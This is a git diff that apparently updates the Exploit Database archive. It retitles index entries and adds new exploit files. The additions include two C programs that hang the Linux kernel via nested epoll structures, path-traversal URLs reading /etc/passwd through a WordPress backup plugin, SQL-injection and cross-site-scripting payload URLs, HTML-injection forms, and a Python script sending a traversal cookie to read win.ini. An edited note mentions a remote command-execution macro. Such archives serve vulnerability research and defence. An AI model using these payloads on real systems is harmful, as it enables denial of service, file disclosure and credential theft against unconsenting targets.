diff --git a/files.csv b/files.csv index ec38059f6..e25fee073 100755 --- a/files.csv +++ b/files.csv @@ -450,14 +450,14 @@ id,file,description,date,author,platform,type,port 585,platforms/windows/dos/585.pl,"MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 Local Root Exploit (suid?)",2004-10-20,Sha0,linux,local,0 587,platforms/linux/local/587.c,"Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0 -588,platforms/windows/remote/588.py,"Ability Server 2.34 FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 +588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000 591,platforms/linux/local/591.c,"socat <= 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0 592,platforms/windows/remote/592.py,"Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21 593,platforms/windows/dos/593.pl,"Quick 'n EasY VER 2.4 Ftp Server remote D.o.S",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0 -598,platforms/windows/remote/598.py,"MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25 +598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25 599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0 @@ -9843,7 +9843,7 @@ id,file,description,date,author,platform,type,port 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0 10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat",2009-12-23,"Ahmed Obied",windows,local,0 10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 local BOF xp sp2",2009-12-23,bibi-info,windows,local,0 -10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 BoF Exploit",2009-12-23,dijital1,windows,local,0 +10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - BoF Exploit",2009-12-23,dijital1,windows,local,0 10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman Cross Site Scripting Vulnerability",2009-12-24,FL0RiX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection SQL injection",2009-12-24,FL0RiX,php,webapps,0 @@ -31881,3 +31881,14 @@ id,file,description,date,author,platform,type,port 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 'tagcloud' Parameter Cross Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 '.ksf' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x '.dps' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0 +35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 +35401,platforms/php/webapps/35401.txt,"SnapProof 'retPageID' Parameter Cross Site Scripting Vulnerability",2011-02-28,"difficult 511",php,webapps,0 +35402,platforms/php/webapps/35402.txt,"Forritun Multiple SQL Injection Vulnerabilities",2011-03-02,eXeSoul,php,webapps,0 +35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x epoll Nested Structures Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0 +35404,platforms/linux/dos/35404.c,"Linux Kernel 2.6.x fs/eventpoll.c epoll Data Structure File Descriptor Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0 +35405,platforms/php/webapps/35405.txt,"VidiScript 'vp' Parameter Cross Site Scripting Vulnerability",2011-03-02,NassRawI,php,webapps,0 +35406,platforms/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 +35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 'local' Parameter Cross Site Scripting Vulnerability",2011-03-03,"AutoSec Tools",php,webapps,0 +35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 +35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 +35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0 diff --git a/platforms/linux/dos/35403.c b/platforms/linux/dos/35403.c new file mode 100755 index 000000000..a251cd1d6 --- /dev/null +++ b/platforms/linux/dos/35403.c @@ -0,0 +1,24 @@ +source: http://www.securityfocus.com/bid/46630/info + +The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. + +Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users. + +#include + #include + int main(void) { + int e1, e2, p[2]; + struct epoll_event evt = { + .events = EPOLLIN + }; + e1 = epoll_create(1); + e2 = epoll_create(2); + pipe(p); + + epoll_ctl(e2, EPOLL_CTL_ADD, e1, &evt); + epoll_ctl(e1, EPOLL_CTL_ADD, p[0], &evt); + write(p[1], p, sizeof p); + epoll_ctl(e1, EPOLL_CTL_ADD, e2, &evt); + + return 0; + } \ No newline at end of file diff --git a/platforms/linux/dos/35404.c b/platforms/linux/dos/35404.c new file mode 100755 index 000000000..2450e3bb8 --- /dev/null +++ b/platforms/linux/dos/35404.c @@ -0,0 +1,75 @@ +source: http://www.securityfocus.com/bid/46630/info + +The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. + +Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users. + +#include +#include +#include +#include + +#define SIZE 250 + +int main(void) { + + int links[SIZE]; + int links2[SIZE]; + int links3[SIZE]; + int links4[SIZE]; + int i, j; + int ret; + int ep1, ep2; + struct timeval start, end; + + struct epoll_event evt = { + .events = EPOLLIN + }; + + ep1 = epoll_create(1); + for (i = 0; i < SIZE; i++) { + links[i] = epoll_create(1); + ret = epoll_ctl(ep1, EPOLL_CTL_ADD, links[i], &evt); + if (ret) + perror("error 1"); + } + for (i = 0; i < SIZE; i++) { + links2[i] = epoll_create(1); + for (j = 0; j < SIZE; j++) { + epoll_ctl(links[j], EPOLL_CTL_ADD, links2[i], &evt); + if (ret) + perror("error 2"); + } + } + for (i = 0; i < SIZE; i++) { + links3[i] = epoll_create(1); + for (j = 0; j < SIZE; j++) { + epoll_ctl(links2[j], EPOLL_CTL_ADD, links3[i], &evt); + if (ret) + perror("error 3"); + } + } + for (i = 0; i < SIZE; i++) { + links4[i] = epoll_create(1); + for (j = 0; j < SIZE; j++) { + epoll_ctl(links3[j], EPOLL_CTL_ADD, links4[i], &evt); + if (ret) + perror("error 4"); + } + } + + ep2 = epoll_create(1); + gettimeofday(&start, NULL); + ret = epoll_ctl(ep2, EPOLL_CTL_ADD, ep1, &evt); + /* creates a loop */ + //ret = epoll_ctl(links4[499], EPOLL_CTL_ADD, ep1, &evt); + if (ret) + perror("error 5"); + gettimeofday(&end, NULL); + + printf("%ld\n", ((end.tv_sec * 1000000 + end.tv_usec) + - (start.tv_sec * 1000000 + start.tv_usec))); + + return 0; + +} \ No newline at end of file diff --git a/platforms/php/webapps/35400.txt b/platforms/php/webapps/35400.txt new file mode 100755 index 000000000..2a3c5b0bc --- /dev/null +++ b/platforms/php/webapps/35400.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46610/info + +The BackWPup plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. + +Attackers can exploit these issues to retrieve the contents of an arbitrary file. Information obtained may aid in launching further attacks. + +http://www.example.com/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1 + +http://www.example.com/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/35401.txt b/platforms/php/webapps/35401.txt new file mode 100755 index 000000000..7d8a503b1 --- /dev/null +++ b/platforms/php/webapps/35401.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/46622/info + +SnapProof is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/cart.php?retPageID=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35402.txt b/platforms/php/webapps/35402.txt new file mode 100755 index 000000000..a51af3fec --- /dev/null +++ b/platforms/php/webapps/35402.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/46629/info + +Forritun is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/grein.php?id=[sqli] +http://www.example.com/rit.php?id=[sqli] +http://www.example.com/index.php?id=[sqli] +http://www.example.com/sida.php?id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35405.txt b/platforms/php/webapps/35405.txt new file mode 100755 index 000000000..05702ecbf --- /dev/null +++ b/platforms/php/webapps/35405.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/46639/info + +VidiScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/index.php?vp=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35406.txt b/platforms/php/webapps/35406.txt new file mode 100755 index 000000000..bd7468329 --- /dev/null +++ b/platforms/php/webapps/35406.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/46671/info + +Support Incident Tracker (SiT!) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Support Incident Tracker (SiT!) 3.62 is vulnerable; other versions may also be affected. + +http://www.example.com/sit-3.62/feedback.php?ax=--%3E%3Cscript%3Ealert(0)%3C%2fscript%3E +http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E +http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E +http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_slashbox.php?rss_url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/35407.txt b/platforms/php/webapps/35407.txt new file mode 100755 index 000000000..fe98cac30 --- /dev/null +++ b/platforms/php/webapps/35407.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46673/info + +phpWebSite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +phpWebSite 1.7.1 is vulnerable; other versions may also be affected. + +http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/35408.txt b/platforms/php/webapps/35408.txt new file mode 100755 index 000000000..80e0828fe --- /dev/null +++ b/platforms/php/webapps/35408.txt @@ -0,0 +1,56 @@ +source: http://www.securityfocus.com/bid/46681/info + +xtcModified is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +xtcModified 1.05 is vulnerable; other versions may also be affected. + +Cross-site scripting: + +http://www.example/admin/categories.php?search=prod"> +http://www.example/admin/orders.php?selected_box=customers">&status=0 + +Html-injection: + +1. + +
+ + + + + + + + + + +'> +'> + +
+ + + +2. + +
+ +'> + + + + + + + + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/35409.txt b/platforms/php/webapps/35409.txt new file mode 100755 index 000000000..821c30dc5 --- /dev/null +++ b/platforms/php/webapps/35409.txt @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/46683/info + +Pragyan CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Pragyan CMS 3.0 beta is vulnerable; other versions may also be affected. + +
+'> +
+ + + +
+ +'> +'> +'> + + + +
+ \ No newline at end of file diff --git a/platforms/windows/remote/34668.txt b/platforms/windows/remote/34668.txt index dbcfe669d..6e0c023c0 100755 --- a/platforms/windows/remote/34668.txt +++ b/platforms/windows/remote/34668.txt @@ -23,4 +23,4 @@ http://localhost:80/?search=%00{.exec|cmd.} will stop regex from parse macro , and macro will be executed and remote code injection happen. -## EDB Note: This vulnerability will run the payload multiple times. Make sure to take this into consideration when crafting your payload. \ No newline at end of file +## EDB Note: This vulnerability will run the payload multiple times simultaneously. Make sure to take this into consideration when crafting your payload (and/or listener). \ No newline at end of file diff --git a/platforms/windows/remote/35410.py b/platforms/windows/remote/35410.py new file mode 100755 index 000000000..545b88fc7 --- /dev/null +++ b/platforms/windows/remote/35410.py @@ -0,0 +1,56 @@ +source: http://www.securityfocus.com/bid/46759/info + +InterPhoto Image Gallery is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +InterPhoto Image Gallery 2.4.2 is vulnerable; other versions may also be affected. + +# ------------------------------------------------------------------------ +# Software................InterPhoto 2.4.2 +# Vulnerability...........Local File Inclusion +# Threat Level............Critical (4/5) +# Download................http://www.weensoft.com/ +# Release Date............3/4/2011 +# Tested On...............Windows Vista + XAMPP +# ------------------------------------------------------------------------ +# Author..................AutoSec Tools +# Site....................http://www.autosectools.com/ +# Email...................John Leitch +# ........................Bryce Darling +# ------------------------------------------------------------------------ +# +# +# --Description-- +# +# A local file inclusion vulnerability in InterPhoto 2.4.2 can be +# exploited to include arbitrary files. +# +# +# --PoC-- + +import socket + +host = 'localhost' +path = '/interphoto' +port = 80 + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, port)) +s.settimeout(8) + +s.send('POST ' + path + '/about.php HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 0\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Cookie: IPLANGV6O1or24t6cI=' + '..%2f' * 8 + 'windows%2fwin.ini%00\r\n' + 'Accept: text/html\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n') + +print s.recv(8192) \ No newline at end of file